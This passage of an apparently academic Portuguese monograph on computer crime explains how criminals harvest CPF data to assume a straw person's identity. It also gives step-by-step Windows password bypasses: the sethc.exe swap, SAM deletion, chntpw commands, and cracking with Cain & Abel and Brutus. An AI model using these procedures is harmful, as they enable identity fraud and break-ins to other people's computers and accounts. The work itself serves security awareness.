  20. 20. 20 Principal obstáculo para a implementação de segurança. Figura 1.Fonte: Módulo Security Solutions (2002, p.7). 2.7 Obtenção de dados Um dos fatores que mais possibilitam pessoas mal intencionadas cometerem crimes deinformática é a exposição de dados. Há diversos dados que um criminoso pode utilizar paracometer um crime. Com o auxílio de um computador, muitos deles podem ser encontradoscomo: dados cadastrais que circulam livremente na internet, identificações únicas emprocessadores e placas de rede, logs (arquivos que armazenam dados sobre o que acontece emum sistema), histórico de navegação, cookies (documentos de texto armazenados pelosnavegadores), lista de documentos recentes, mensagens de comunicadores instantâneos e atémesmo documentos do pacote de programas Microsoft Office que armazenam informaçõessobre quem criou o documento (THOMPSON, 2004). Atualmente, uma das melhores formas de se conseguir informações são os sites debusca na internet. Através deles, é possível obter informações das mais diversas sobre váriaspessoas que nem imaginam ter seu nome exposto na internet Estas informações sãofrequentemente oriundas de cadastros feitos em sites ou, até mesmo, cadastros feitos emestabelecimentos físicos. Não são só dados cadastrais que circulam pela internet. Segundo Rafael Sbarai em umartigo publicado na revista Veja, em abril de 2010, o Facebook, uma das maiores redes sociais
  21. 21. 21do mundo (supera a marca de 400 milhões de usuários), em sua décima sétima mudança naspolíticas de privacidade, tornou públicos os dados de todos os seus usuários. Dentre asinformações contidas nestes dados estão: nome, profissão, cidade, lista de amigos e álbum defotos. Ainda de acordo com a reportagem, as autoridades de proteção de dados da UniãoEuropeia consideraram esta abertura como “inaceitável” (SBARAI, 2010). Além das fontes já citadas, também é possível encontrar informações de alto valor emsites como: http://telelistas.net/, http://www.previdenciasocial.gov.br/,http://www.detran.sp.gov.br/, http://www.registro.br/, http://www.whois.net/,https://registro.br/cgi-bin/whois/ e muitos outros. 2.8 Como os criminosos escolhem um “laranja” A escolha de um “laranja” é extremamente útil para um criminoso cometer diversostipos de crimes tornando-se requisito básico para quem não quer ser descoberto. Há diversos métodos de se escolher um” laranja”. Uma das formas mais simples éutilizar sites de busca na internet para conseguir dados de pessoas com o nome limpo. Aquantidade de dados e a facilidade de obtê-los possibilitam ao criminoso escolher até mesmoque nome ele quer utilizar. No exemplo a seguir, foi utilizado um navegador comum para entrar no site“www.google.com.br” e, supondo que o criminoso tenha escolhido um nome comum como“Mario”, foi digitado o seguinte: "CPF: " Mario. Resultados da pesquisa para o termo "CPF: " Mario. Figura 2
  22. 22. 22 Na imagem anterior é possível observar que, logo nos três primeiros resultados dabusca, o criminoso pode achar algo que possivelmente lhe interesse. O primeiro resultadomostra até mesmo o endereço (além do CPF) de um Mário que possivelmente mora em MinasGerais. No segundo, é possível verificar um site do governo federal divulgando informaçõespessoais de diversas pessoas para, literalmente, quase o mundo inteiro. No terceiro resultado,mais uma vez é possível visualizar o nome, CPF e endereço de outra pessoa que se chamaMario. Após a rápida obtenção destes dados, o criminoso pode entrar no site“http://www.receita.fazenda.gov.br/aplicacoes/atcta/cpf/consultapublica.asp” e verificar asituação cadastral do CPF para não correr o risco de ter algum insucesso ao cometer fraudesdevido a problemas com o documento. Com o nome completo da pessoa e outros dados pessoais, muitas vezes é possívelencontrar em outros sites diversas informações do futuro “laranja”. Caso o criminoso queira irmais além, pode escolher um “laranja” que tenha mais ou menos sua idade (preferencialmentede outro estado), fazer um boletim de ocorrência passando-se pelo “laranja” em algumadelegacia dizendo que foi assaltado e teve todos os seus documentos roubados, e começar aprovidenciar, legalmente, novos documentos. O criminoso pode conseguir uma certidão denascimento em um cartório e, levando em consideração que a carteira de identidade é deresponsabilidade dos governos estaduais e válida em todo o território nacional, de posse dacertidão de nascimento e quatro fotos, a pessoa com más intenções pode tentar fazer a carteirade identidade em algum estado que não adotou o novo documento com chip e banco de dadosintegrado de impressões digitais (SIQUEIRA, 2010). Após conseguir documentos como RG, CPF e certidão de nascimento, todos elesexpedidos por órgãos oficiais, é possível obter ainda mais documentos, alugartemporariamente uma casa, abrir conta em banco, obter empréstimos, fazer compras e,posteriormente, descartar todos os documentos do “laranja” e voltar para seu estado de origemcom os bens adquiridos, agindo como se nada tivesse acontecido. Possivelmente, a pessoalesada só irá perceber o que aconteceu quando for investigar o motivo de seu nome estar“sujo”. Mesmo se conseguir provar que não fez compras ou pegou empréstimos, terá muitosproblemas para reparar todo o dano causado. Com o exemplo acima é possível concluir que, se nenhum site na internet tratassedados pessoais como se fossem informações públicas, o criminoso não teria tanta facilidadepara agir. O exemplo também permite afirmar que não é necessário um elevado conhecimentoem informática para utilizar a tecnologia como ferramenta principal, na hora de cometer um
  23. 23. 23crime. Outras artimanhas menos conhecidas também podem ser utilizadas para escolher um“laranja” a fim de realizar de crimes difíceis de serem investigados. Muitas pessoas compram equipamentos como dispositivos de rede sem fio e apenasligam o aparelho, preservando as configurações originais de fábrica. Por padrão, a grandemaioria desses dispositivos não possui qualquer configuração de segurança como, porexemplo, uma senha de acesso. Uma pessoa com conhecimentos superficiais de informáticapode, sem dificuldade alguma, utilizar a conexão que o dono do aparelho possui com ainternet e praticar atividades como, por exemplo, acessar sites de pornografia infantil. Nestecaso, o acesso pode ser rastreado pela polícia e, a pessoa que primeiramente será encontrada éa dona do equipamento sem fio. Mesmo se for definida uma senha para acesso lógico aoequipamento, uma pessoa com conhecimentos intermediários em redes sem fio podefacilmente descobrir a senha se ela não for complexa e de um padrão de tecnologia(protocolo) seguro. Mesmo uma pessoa que não possui equipamentos de rede sem fio, masmantém seu computador desatualizado, muitas vezes com vírus, também pode, com grandefacilidade, tornar-se um “laranja” tendo seu computador invadido. Outra forma de se utilizar um “laranja”, bastante verificada em empresas, é realizarum procedimento chamado e-mail spoofing. Esta técnica consiste em forjar um e-mail, muitasvezes com um remetente que é conhecido da pessoa que recebe. Um exemplo de como estatécnica pode ser utilizada é um criminoso utilizar o endereço de e-mail de algum funcionáriode uma empresa, passando-se por ele, e tentar obter alguma informação que poucas pessoasconseguiriam. 2.9 Exemplos reais de crimes Os crimes de informática, dos mais brandos aos mais nefastos, acontecem com grandefrequência em vários países e empresas com diferentes níveis de segurança. A grande maioriadas pessoas não dá a importância devida às notícias ou, muitas vezes, nem fica sabendo delas.Os bancos, por exemplo, não costumam divulgar seus incidentes de segurança por razõesóbvias – quem confiaria seu dinheiro a um banco declaradamente inseguro? –, porém, épossível encontrar diversos relatos pessoais e não formais. Por exemplo, se a frase ”Caixaeletrônico do Banco invadido por hackers”, for digitada no campo de busca do maior site decompartilhamento de vídeos do mundo, será mostrado um vídeo onde há um caixa eletrônico
  24. 24. 24de uma instituição financeira brasileira de grande porte com a imagem de uma mulher nua.Uma suposta vítima de fraude filmou o caixa eletrônico e narrou o fato possivelmenteocorrido. Para dar mais credibilidade às hipóteses e exemplos citados ao longo deste trabalho, foramextraídas de jornais respeitados, tribunais de justiça e revistas, algumas notícias que podemconfirmar as afirmações do parágrafo acima. 2.9.1 Incidentes envolvendo bancos O banco Bradesco S/A foi condenado pelo Tribunal de Justiça de Minas Gerais a indenizarum advogado que sofreu uma invasão cracker e teve um prejuízo de R$ 8.626,31. Oadvogado obteve direito de ressarcimento do valor, além de uma indenização por danosmorais no valor de R$ 5.800. Assim que percebeu algo de errado com sua conta, o advogadocontatou o gerente do banco e foi informado de que nada poderia ser feito. O advogado entãoregistrou um boletim de ocorrência, notificou oficialmente a agência e, segundo ele, o banconão respondeu aos apelos. Em sua defesa, o banco Bradesco declarou que a vítimapossibilitou que terceiros tivessem acesso à sua senha de uso pessoal e intransferível, além dedeclarar que o sistema de segurança do banco é infalível (TRIBUNAL DE JUSTICA DE MINASGERAIS, 2010). Um cracker brasileiro de 24 anos foi preso no dia 04/06/2010 após pedir US$ 500 mil aum banco de investimentos de São Paulo para evitar o roubo de US$ 2 milhões. O crackerenviava e-mails para o banco com informações sigilosas (para provar que tinha acesso aosistema) e passava um número de celular para contato (o celular foi comprado com os dadosde um dos diretores da empresa). O grande erro do cracker foi comparecer pessoalmente parareceber o dinheiro na sede do banco localizado na AV. Paulista, em São Paulo, onde agentesdo Departamento de Investigações Sobre Crime Organizado (DEIC) prenderam o criminoso(AGÊNCIA DO ESTADO, 2010). 2.9.2 Invasões No dia 30 de maio de 2010, um domingo, o site da Ordem dos Advogados do Brasil(OAB) foi invadido e ficou com uma imagem dizendo ser de autoria dos “BraziliansDefacers” e contendo trocadilhos, palavras de baixo calão e frases de repúdio ao governo do
  25. 25. 25Presidente Lula. A imagem permaneceu no site até às 21h do domingo e, posteriormente, osite ficou em manutenção (PAVARIN, 2010). Nem quem comanda o país está imune. Logo após o Partido dos Trabalhadores (PT) terficado mais de 24 horas com seu site fora do ar em um final de semana devido a um problemadecorrente de uma invasão e, também por mais de 24 horas o Partido do MovimentoDemocrático Brasileiro (PMDB) ficar com o site indisponível pelo mesmo problema, no dia19/04/2010, outro domingo, o site do Partido da Social Democracia Brasileira (PSDB)também foi invadido. No fim de semana, o cracker invadiu o site por pelo menos duas vezes eacrescentou a frase “Partido dos corruptos” na página inicial. Após algum tempo, o internautaera direcionado automaticamente para uma página de autoria do cracker que expunha 40propostas para o Brasil. O site ficou indisponível toda a madrugada do sábado para odomingo, foi colocado em funcionamento novamente ao meio-dia, quando sofreu um novoataque. Por volta das 20h da segunda-feira o site ainda encontrava-se indisponível (URIBE,2010). 2.9.3 Sequestro Em meados de 2010, um jovem de 19 anos foi sequestrado e mantido em cativeiro durantecinco dias em Ilha Comprida (SP), tendo sua família aterrorizada pelos sequestradores que,em um dos piores momentos da negociação, foi questionada, pelo sequestrador, se gostaria dereceber o dedo ou a orelha do jovem como um “presente”. Felizmente, o estudante foilibertado pela polícia e os nove integrantes da quadrilha foram presos. Para este trabalho acadêmico, o fato mais relevante a ser analisado no caso de sequestroacima descrito é a forma como a quadrilha escolhia suas vítimas. A polícia informou que ossequestradores passavam horas em sites de relacionamento na internet à procura de pessoascom sinais de riqueza. Em outras palavras, a internet servia como uma ferramenta para oscriminosos localizarem pessoas monetariamente favorecidas, além de descobrir ocomportamento das vítimas (horário de entrada e saída de casa, entre outras informações). Opai do estudante sequestrado reconheceu que o filho expôs informações demais na internet(G1SP, 2010).
  26. 26. 263 Técnicas e conhecimentos básicos Popularmente conhecidas como “receitas de bolo”, algumas técnicas que necessitam depouco ou nenhum conhecimento de informática podem ser utilizadas para obter acessos nãoautorizados, danificar sistemas, obter ganhos financeiros, descobrir informações sigilosas ou,entre as diversas aplicações possíveis, ajudar em algum dos passos dados durante a realizaçãode um ataque. Uma das primeiras coisas que um cracker aprende ou procura aprender é como quebrarsenhas. Senhas de sistemas amplamente utilizados (como o Windows) têm suas brechasfrequentemente exploradas; muitas vezes as brechas encontradas permanecem abertas duranteanos. É comum que bancos e sistemas que necessitam de segurança em nível elevado, utilizemoutras formas de autenticação de usuários privilegiados para a liberação de acessos, como, porexemplo, autenticações biométricas, tokens (dispositivos que geram senhas diferentes apósum tempo determinado) e cartões magnéticos. Ainda assim, em sistemas 100% lógicos, asenha ainda é a forma mais utilizada para garantir que o solicitante do acesso seja realmente apessoa autorizada a acessar. 3.1 Engenharia social Com o avanço da tecnologia e algoritmos de criptografia, a quebra de senhas por métodospuramente técnicos nem sempre é a melhor opção. Uma das falhas mais explorada em casosde emprego de tecnologias avançadas para controle de acessos é a falha humana. Em um sistema corporativo, obter acesso a um sistema somente com a engenharia social,pode ser um procedimento relativamente simples. Toda grande empresa tem um sistema desuporte ao usuário (chamado de Help Desk ou Service desk) que, em sua maioria, adotapadrões de segurança. Para o controle de acesso e proteção das senhas, uma ação adotada porboa parte dos serviços de suporte aos usuários dos sistemas corporativos é a solicitação dedados pessoais de seus funcionários antes de fazer a troca (reset) de uma senha. Em grandes empresas, as senhas são frequentemente esquecidas pelos funcionários, o quetorna o trabalho de troca de senhas uma ação normal e constante por parte dos analistas desuporte ao usuário ou pelos responsáveis por esta tarefa. Uma empresa que solicita somente onúmero do CPF ou outro documento de um usuário antes de trocar sua senha, pode ter seu
  27. 27. 27sistema de segurança facilmente burlado. Para exemplificar o uso da engenharia social quepode ser feito neste caso, é possível descrever um cenário no qual um funcionário (maisconhecido como insider) foi pago por uma concorrente para obter informações sigilosas queforam enviadas para a caixa de correio eletrônico de seu chefe ou diretor. O funcionáriocriminoso pode utilizar a internet ou algum outro meio para conseguir o CPF do titular daconta de e-mail e, simplesmente, ligar para o help desk, dizer que esqueceu a senha, confirmaros dados da vítima e obter uma nova senha. A desvantagem deste processo é que apossibilidade de a vítima rapidamente descobrir que há algo de errado com sua conta de e-mail é muito alta, o que obriga o criminoso a, assim que conseguir o acesso, copiar o maisrápido possível as informações que podem ser úteis. 3.2 Outras formas de ligar o computador Com acesso físico a um computador, a tarefa de investigá-lo, danificá-lo ou qualquer outraprática torna-se, obviamente, mais fácil. Obtendo-se o acesso físico ao computador e um pen-drive, é possível descobrir senhas, visualizar arquivos e até mesmo apagar todo o conteúdoarmazenado. Quando um computador comum é iniciado, primeiro são executadas instruções básicaspara o funcionamento do sistema e só depois disso é acessado o local onde está o sistemaoperacional (como um HD com o Windows) e o computador continua a carregar os arquivosarmazenados. Na maioria dos computadores é disponibilizada uma opção para o usuário escolher a partirde qual local ele deseja que o sistema seja carregado. Para obter acesso total ao computador ea tudo o que nele está instalado, uma boa solução é utilizar sistemas operacionais paralelos ousistemas que inicializam a partir de CD/DVD, pen-drives ou a partir da rede. Sistemas operacionais paralelos nada mais são do que outros sistemas operacionaisinstalados no mesmo computador. Sistemas que inicializam a partir de CD/DVD (tambémconhecidos como Live-CDs), são sistemas operacionais, geralmente completos, que em suagrande maioria não alteram nenhuma configuração no computador e deixam poucos ounenhuns rastros. Para inicializar um computador sem a necessidade de carregar o Windows, por exemplo,basta fazer o download de uma distribuição Live-CD do Linux, e configurar o computadorpara que inicie a partir do CD. As opções de inicialização (chamadas de opções de Boot)
  28. 28. 28costumam variar pouco de computador para computador e, para acessá-las, deve-se digitaruma tecla que varia entre o F2, Delete, Esc, F6, F8 e F10, logo que o computador é ligado(antes de o sistema operacional ser carregado). Neste trabalho, para exemplificar alguns ataques, é utilizada a quarta versão dadistribuição Back-Track do Linux. Esta distribuição foi especialmente criada para a realizaçãode testes de penetração, porém, outras podem ser utilizadas. Há também a possibilidade deiniciar sistemas a partir de pen-drives e Live-CDs baseados em sistemas Windows, que podemser facilmente encontrados digitando-se os termos “boot pendrive” e “Windows PE” nos sitesde busca. Também é possível obter acesso total ao sistema com alguns CDs de instalação, como, porexemplo, o DVD de instalação do Windows Vista. Para visualizar, copiar ou apagar algumarquivo a partir de um DVD de instalação do Windows Vista é necessário configurar ocomputador para que inicie pelo DVD e então aparecerá a mensagem para apertar uma teclapara iniciar a partir do CD ou DVD. Ao apertar uma tecla qualquer, o sistema começará acarregar o programa de instalação. Após esta etapa, irá aparecer a tela para a escolha doidioma e, ao clicar em “Avançar”, o sistema trará as opções de instalar o Windows ou repararo computador. A opção de reparar o computador deve ser escolhida e, após a exibição da telaapresentando a instalação a ser reparada, será mostrada a janela de recuperação do sistema,com várias opções, inclusive o acesso às linhas de comando com opções de administrador,como na figura abaixo. Tela de recuperação retirada do DVD do Windows Vista. Figura 3
  29. 29. 29 3.3 Obter acesso completo a sistemas Windows protegidos por senha A grande maioria dos sistemas operacionais (como o MAC OS, Linux, Unix, etc.)possuem graves brechas de segurança, porém, devido à quantidade de usuários dos sistemasWindows, ele é o mais explorado. Há variadas formas de se conseguir elevação de privilégios em sistemas operacionaisWindows. As mais óbvias e conhecidas são a exclusão ou descoberta de senhas de usuáriosadministradores. Porém, há outras formas de conseguir acesso de administrador, como autilização de outras contas nativas do Windows a exemplo da conta “system” (com maisprivilégios que a conta de administrador), a conta de convidado (geralmente limitada) e autilização de programas que utilizam outras contas mesmo quando executados por usuárioscom acesso limitado. Das técnicas mencionadas, talvez a mais utilizada e conhecida para obter acessoprivilegiado a sistemas Windows é usufruir da conta “system”. Uma forma de utilizá-la éexecutar o programa que terá privilégios de sistema antes de algum usuário efetuar o logon(acesso ao sistema). Um exemplo de como isso pode ser feito é utilizar a proteção de tela ouas teclas de atalho do Windows, pois elas podem ser ativadas antes de algum usuário digitarseus dados e acessar o sistema (tela de logon). Quando configurada, a proteção de tela entra automaticamente após certo período detempo e o programa responsável por sua execução é o “Logon.scr”, que fica emC:WindowsSystem32 e, em versões mais antigas do Windows, os arquivos de proteção detela são os com extensão “.SCR” e costumam ficar na pasta C:WINDOWSSYSTEM. A proteção de tela encontra-se habilitada na maioria dos sistemas Windows e, quandoexecutada, no caso dos sistemas mais novos, qualquer programa que tenha o nome“Logon.scr” e estiver dentro da pasta C:WindowsSystem32 será executado. Uma desvantagem de utilizar a proteção de tela para obter acesso não autorizado é quenem sempre ela está ativada e, mesmo quanto está, é necessária a espera de alguns minutos ouaté horas para a execução do programa. A utilização das teclas de atalho do Windows para aexecução de programas a partir da conta “system” mostra-se mais eficaz devido ao fato de serpossível sua execução a qualquer momento (basta apertar a tecla Shift por cinco vezes) e porestar habilitada em praticamente todos os sistemas operacionais Windows. Na prática, para utilizar as teclas de atalho a fim de executar um programa com acessos desistema, deve-se renomear ou apagar o arquivo “sethc.exe”, que fica localizado no diretório
  30. 30. 30C:WindowsSystem32, deixar dentro deste diretório o arquivo que queremos executar erenomear o novo programa para “sethc.exe”, conforme a figura a seguinte. Prompt de comando (cmd.exe) renomeado para “sethc.exe”. Figura 4 No figura acima, é possível visualizar o console de comandos do Windows (prompt decomando; Programa “cmd.exe”) renomeado para “sethc.exe”. O prompt de comando ficalocalizado no mesmo diretório do programa de teclas de atalho. A partir dele, é possívelrealizar diversas ações. No exemplo do sistema acima, a qualquer momento em que a teclaShift for pressionada por cinco vezes consecutivas, será aberta uma janela para a inserção delinhas de comando. As teclas de atalho funcionam mesmo antes de algum usuário efetuar o logon (visando aacessibilidade de usuários com necessidades especiais). Portanto, caso as alterações acimasejam feitas da maneira correta e a tecla Shift for pressionada por cinco vezes consecutivas natela de logon, será aberta uma janela do prompt de comando com mais privilégios que a contade administrador do sistema.
  31. 31. 31 Na figura abaixo, o prompt de comandos foi utilizado para trocar a senha de um usuáriocom o comando “net user nome_do_usuário senha_desejada”. Alteração da senha. Figura 5 Alguns sistemas mais seguros substituem automaticamente o arquivo “sethc.exe”, por umnovo, devido ao fato de ele ser um arquivo do sistema. Para resolver esse problema é precisorenomear rapidamente o novo arquivo antes da substituição. A pessoa com intenções de burlaro sistema também pode fazer a substituição do arquivo através de um Live-CD com opção deescrita, caso não possua nem mesmo uma conta limitada no computador da vítima. Esta técnica já é antiga e conhecida, porém, ainda funciona no mais novo sistemaoperacional da Microsoft, o Windows 7, que não teve a falha corrigida. O único possívelproblema que pode ocorrer no Windows Vista/7 é o sistema não permitir que o arquivo sejarenomeado. Neste caso, é preciso alterá-lo a partir de um Live-CD ou tornar-se dono doarquivo e liberar as permissões. Para obter a propriedade sobre o arquivo e, posteriormente,liberar as permissões de escrita, é preciso seguir os seguintes passos: - Clicar com o botão direito sobre o arquivo “sethc.exe”, selecionar as propriedades, clicarna aba segurança e, posteriormente, no botão “ Avançadas”.
  32. 32. 32Obter propriedade de arquivo. Figura 6-Na janela que aparecer, é preciso selecionar a aba proprietário e clicar no botão editar.Obter propriedade de arquivo (2). Figura 7
  33. 33. 33 Ao clicar em “Editar”, aparecerá a tela para modificar o proprietário do arquivo. Bastaescolher o novo proprietário, clicar em aplicar e em OK. Obter propriedade de arquivo (3). Figura 8 Após obter a propriedade do arquivo, o último passo é liberar as opções de escrita noarquivo para que seja possível renomeá-lo ou apagá-lo. Para isso, é necessário clicarnovamente com o botão direito do mouse em “sethc.exe”, selecionar a opção “Propriedades”,aba “Segurança”, botão “Editar”, selecionar o usuário, liberar as permissões, clicar em“Aplicar” e “Yes”. Obtendo permissões. Figura 9
  34. 34. 34 3.3.1 Senhas do Windows 95,98 e Millennium Em versões antigas como as de 95, 98 e a Millennium, para acessar um sistema comsenha, bastava clicar em cancelar na tela que solicitava a senha para acesso ao sistema.Algumas medidas de segurança podiam ser tomadas para incrementar a segurança, mas partedas medidas poderia ser fechada ao se pressionar as teclas Ctrl+Alt+Delete no teclado eescolhendo a opção de finalizar tarefa, a fim de encerrar o programa que bloqueava o acessoou apagar os arquivos com o nome do usuário e extensão “PWL”, localizados em“C:WINDOWS” (OLIVEIRA, 2000). Na figura abaixo, é possível verificar a tela de um computador com o WindowsMillennium, no qual há somente um usuário (chamado PI) com senha. Para deixar o sistemasem senha de acesso, basta apagar o arquivo.Tela do Windows Millennium. Figura 10 3.3.2 Senhas do Windows NT e 2000 Até mesmo as versões NT e 2000, consideradas mais seguras, podem ter todas as suassenhas e contas de usuários apagadas, somente com a exclusão de arquivos. No caso destessistemas, o arquivo com informações de usuários e senhas é o arquivo SAM localizado napasta C:WINNTsystem32config. Para excluir as contas de usuários e suas respectivassenhas, basta apagar três arquivos: na pasta C:WINNTsystem32config os arquivos SAM eSAM.LOG e, na pasta C:winntrepair, o arquivo SAM. A diferença dos sistemas baseados noWindows NT é não ser possível a exclusão de arquivos de senhas com o sistema funcionandoe sem nenhuma ferramenta especial, pois o arquivo fica em uso. A solução é apagá-los comoutro sistema operacional instalado no computador, utilizando um Live-cd, pen-drive com oLinux ou Windows instalado ou o CD de instalação de algum sistema operacional.
  35. 35. 35 3.3.3 Senhas do Windows XP, 2003, Vista e 7 No caso dos sistemas operacionais mais recentes da Microsoft, apagar ou trocar senhasdos usuários ou administradores do sistema sem possuir uma conta, é uma tarefa que exige autilização de diferentes procedimentos ou ferramentas, pois não se resume em excluirarquivos. Uma das formas mais simples de se obter acesso às contas de administrador emsistemas operacionais Windows mais novos é utilizar algum CD de inicialização que contenhaferramentas para realizar tal tarefa. Uma boa opção é o “Ultimate Boot CD (UBCD)” ou o“Hiren´s BootCD”. Há também ferramentas mais avançadas e com diversas opções para amanipulação de senhas e usuários em sistemas Windows. Para exemplificar o uso deferramentas com opções avançadas, utilizaremos o programa “chntpw” que, por padrão, jávem instalado na distribuição “BackTrack” – do Linux. Dentre as opções que o “chntpw” oferece estão: editar o registro do Windows, editaropções do console de recuperação, manipular senhas de usuários, desbloquear contas e incluiruma conta limitada no grupo dos administradores. Vale lembrar que, para alterar corretamenteuma senha em sistemas Windows mais atuais, é preciso uma informação (hash) do arquivo“system” que fica no mesmo diretório do arquivo “SAM”. O procedimento de troca de senhaé pouco mais complexo, portanto, apenas será explicado como é feito para apagar a senha deuma conta de um usuário do sistema. Caso seja necessário colocar uma nova senha, bastaacessar a conta (que estará sem senha) e adicionar uma. Com o “BackTrack 4” iniciado a partir de um CD, DVD ou pendrive, é possível acessarum HD com a instalação do Windows utilizando os seguintes comandos: cd / mkdir /media/teste mount dev/hda1 /media/teste O último comando deve ser modificado para “mount dev/sda1 /media/teste” caso o discorígido do computador utilize a tecnologia Serial Advanced Technology Attachment (SATA). Em casos de problemas com o acesso ao disco rígido que contém a instalação doWindows, pode ser necessário forçar a montagem da partição. O seguinte comando pode serutilizado para forçar a montagem da partição: mount -t ntfs-3g /dev/hda1 /media/teste -o force Após a obtenção de acesso ao local onde o Windows está instalado, é possível verificar asopções de manipulação do sistema com o comando:
  36. 36. 36 chntpw -i media/teste/WINDOWS/system32/config/SAM Caso não ocorra nenhum imprevisto, e o comando acima seja digitado corretamente(levando em consideração letras maiúsculas e minúsculas), resultados conforme a imagemseguinte deverão aparecer. Opções para alterar o sistema Windows. Figura 11 Para apagar a senha de um usuário do sistema, a primeira opção deve ser selecionada. Caso a tecla “enter” seja pressionada sem a escolha de nenhuma opção, automaticamentea primeira será escolhida. Após a escolha da primeira opção, será exibida uma lista com todosos usuários que possuem uma conta no sistema e informações como, por exemplo, se a contaestá habilitada, bloqueada, o código em número hexadecimal do Relative-Identifier (RID) e sea conta possui privilégios de administrador. Para alterar a senha de algum usuário, bastadigitar seu respectivo nome. Caso nenhum nome de usuário e nenhum RID sejam digitados, ousuário “Administrador” será automaticamente selecionado se a tecla “enter” for pressionada. A figura seguinte ilustra como as opções de alteração de contas de usuários são
  37. 37. 37apresentadas pelo programa. Opções para alterar senhas dos usuários. Figura 12 Como é possível visualizar na figura acima, o programa também exibe informações sobreas políticas de senha do sistema e oferece opções para a alteração de contas de usuário. Ao selecionar a primeira opção “Edit user data and passwords”, o aplicativo faz umalistagem das contas de usuários (quadro vermelho). As contas que aparecem com a opção“dis/lock” estão bloqueadas ou desabilitadas. Após digitar o nome de um usuário ou seu respectivo RID em número hexadecimal, seráexibida uma tela com a qual será possível concluir a exclusão de senha de usuário. Ailustração a seguir destaca com setas vermelhas as opções que devem ser selecionadas paraexcluir com sucesso a senha de algum usuário do sistema.
  38. 38. 38 Como é possível verificar no exemplo abaixo, após a mensagem de sucesso apresentadapelo aplicativo, em condições normais, basta salvar as alterações para que a operação sejarealizada com êxito. Finalização do processo de exclusão de senha. Figura 133.3.4 Descobrir senhas sem alterá-las O procedimento de descoberta de senha, além de mais vantajoso para um cracker oupessoa com más intenções, é bastante diferente e mais trabalhoso que a simples exclusão outroca de senha. (ASSUNÇÃO, 2002, p.55) Para exemplificar um processo simples de quebra de senhas, foi utilizado o programa“Cain & Abel v4.9.36” e os arquivos “SAM” e “system” de um sistema Windows XP Media
  39. 39. 39Center com o Service Pack 2. Durante a elaboração desta monografia, este procedimentotambém foi testado nos sistemas operacionais mais atuais da Microsoft, funcionando semproblemas. Também a fim de exemplificar a obtenção dos arquivos de senha sem anecessidade de utilizar um Live-CD ou outra forma de iniciar o sistema, foi utilizado oprograma “FTK Imager v2.5.3.14”. Qualquer forma de obtenção dos arquivos pode serutilizada, porém, o procedimento descrito abaixo pode ser útil para sistemas com dadoscriptografados ou que possuem senhas no sistema básico de entrada e saída (BIOS) e nãopermitem a inicialização a partir de um dispositivo móvel. A obtenção dos arquivos de senha com o sistema ainda em execução é possível com autilização de programas para recuperação de arquivos excluídos, como o “NTFS Reader” ou,como na imagem abaixo, o “FTK Imager”. Obter arquivos “SAM” e “system” com o sistema em execução. Figura 14 Após obter os arquivos que contêm informações sobre as senhas, a pessoa com aintenção de descobri-las pode abrir os arquivos “SAM” e “system” com o programa “Cain &Abel” e escolher um dos métodos de quebra de senhas disponíveis.
  40. 40. 40 A imagem abaixo ilustra as etapas realizadas para carregar os arquivos do sistema. Após arealização das etapas, serão carregadas informações sobre todos os usuários do sistema. Utilização do Cain. Figura 15 Este aplicativo oferece três opções para descobrir senhas de contas de usuários: ataque dedicionário, força bruta e Rainbow Tables. Um ataque de dicionário é baseado em uma lista(arquivo de texto) que contém uma grande quantidade de possíveis senhas. Pode ser ummétodo extremamente rápido e eficiente caso um bom arquivo de dicionário (wordlist) sejautilizado. Uma Wordlist, além de comprada ou baixada da internet, pode ser criada porprogramas como o “DCM” e o “Wordlist Producer” (TOMPSON, 2004, p159). O ataque deforça bruta, por sua vez, tenta todas as combinações possíveis entre caracteres previamenteescolhidos. Para armazenar as senhas dos usuários, o Windows utiliza uma sequência de númeroshexadecimais (hash) para dificultar o processo de descoberta de senhas. O hash das senhas éobtido através de um complexo cálculo matemático, o que aumenta significativamente otempo necessário para descobrir as senhas. Visando a diminuição deste tempo, arquivos
  41. 41. 41contendo uma lista de hashs já calculados (também conhecidos como Rainbow Tables)frequentemente são utilizados com o intuito de diminuir o tempo do processo. Para a criação de Rainbow Tables, podem ser utilizadas ferramentas como o “Winrtgen”,parte integrante do “Cain & Abel v4.9.36”. No exemplo abaixo é utilizado um ataque de força bruta que, apesar de ser um métodoque pode levar horas ou até mesmo anos (dependendo da complexidade da senha e poder deprocessamento) ainda é bastante eficiente, além de não necessário nenhum arquivo dedicionário ou Rainbow Table para utilizá-lo. Força bruta com o Cain. Figura 16 O “Cain & Abel” é uma poderosa ferramenta capaz de, entre outras coisas, descobrirsenhas de diversos sistemas por diferentes métodos. Senhas com menos de oito caracterespodem ser descobertas com facilidade em menos de um dia. Neste exemplo, o programa levoumenos de um segundo para revelar uma senha de quatro dígitos (extremamente fraca). Nafigura anterior é possível verificar (círculo vermelho) que o aplicativo indica as possíveis
  42. 42. 42senhas com menos de oito dígitos. Crackeando. Figura 17 O tempo de processamento que é necessário para a descoberta das senhas é aumentadoexponencialmente, caso a senha contenha caracteres especiais e seja composta por mais doque sete caracteres. Segundo as estimativas de tempo feitas pelo software utilizado, umasenha que possui caracteres especiais e cerca de quatorze dígitos, pode demorar até três anospara ser quebrada em um computador comum com processador “Core 2 Duo” de 2,3 GHz. 3.3.4.1 Senhas armazenadas no computador Senhas armazenadas no computador, em sua grande maioria, são facilmente decifradas enão exigem tempo e processamento. O próprio “Cain & Abel” é capaz de decifrar, entreoutras senhas, as armazenadas no navegador de internet, senhas de redes sem fio e senhas dee-mails armazenadas.
  43. 43. 43 De forma extremamente rápida é possível visualizar todas as senhas de e-mails de todosos usuários do computador ou todas as senhas de redes sem fio, como na figura a seguir. Senhas das redes sem fio já acessadas. Figura 18 3.3.4.2 Invasão de contas de e-mail e sites por meio da senha Há diversas maneiras de descobrir a senha de um e-mail. Um método que não se baseiadiretamente em erros cometidos por parte do usuário do e-mail é utilizar ferramentas quetentam acessar o e-mail com diversas senhas até decifrá-la (THOMPSON, 2004, p.150). O “Brutus” é um programa capaz de descobrir senhas de sistemas acessados através doprotocolo Hipertext Transfer Protocol (HTTP), File Transfer Protocol (FTP.) – útil parainvasão de sites –, Post Office Protocol – protocolo de e-mail –, entre outros. Para exemplificar a quebra de senha de uma conta de e-mail, o endereço eletrônico“papainoel3@yahoo.com.br” foi especialmente criado para este fim.
  44. 44. 44 Na tela principal da segunda versão do programa “Brutus”, apenas alguns itens sãonecessários configurar para a realização da tentativa de ataque. Brutus. Figura 19 Como o nome sugere, o “Brutus” suporta ataques de força bruta, porém, neste exemplo,foi utilizada uma wordlist. Wordlist. Figura 20
